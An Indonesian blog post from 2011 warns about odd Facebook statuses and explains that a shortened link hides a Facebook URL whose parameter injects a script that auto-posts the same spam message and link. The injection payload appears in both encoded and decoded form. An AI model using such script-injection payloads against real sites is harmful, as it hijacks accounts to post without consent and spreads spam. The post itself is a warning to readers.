jump to navigation

Status di FB aneh-aneh? kena jebakan betmen deh! Maret 29, 2011

Posted by dedewinasis in Fenomena, Indonesia, komputer, life style, Uncategorized.
Tags: , , , ,
trackback

Hari ini sepertinya lagi marak bangged status FB yang aneh dan cenderung norak. Hummm,,,,saya ga sengaja menemukan status milik teman yang tumben-tumbenan kok kaya begini…ternyata eh ternyata itu semacam produk hacking dan bukannya aplikasi FaceBook. Hasil saya browsing, saya temukan informasi berikut :

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E

Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya :(
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :Dhttp://tinyurl.com/sampahh';document.forms[0].submit();}</script>

informasi dari :http://ai23.wordpress.com/2011/03/29/hackingbahaya-url-pendek-fb/#comment-4267

sooo..harap hati-hati deh kalo liat status temen-temen anda seperti itu..hehehe. Dan bagi yang sudah terlanjur silakan di remove sajah !! trims (dedew:2011)

Komentar»

1. Hati-hati Link Situs porno nempel di status anda? « dede winasis - Maret 31, 2011

[…] adanya status yang norak dengan isi yang sama di beberapa status orang (baca di posting sebelumnya) yang diakibatkan oleh adanya akal-akalan si pembuat spam atau virus atau apalah bahasa kerennya, […]

2. loker - Mei 26, 2011

hehe, saya prnah kna tuh, untung lngsung buru2 saya ganti password setelah sadar itu jebakan betmen

dedewinasis - Mei 26, 2011

hahaha pintar ente gan!!! hahaha


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: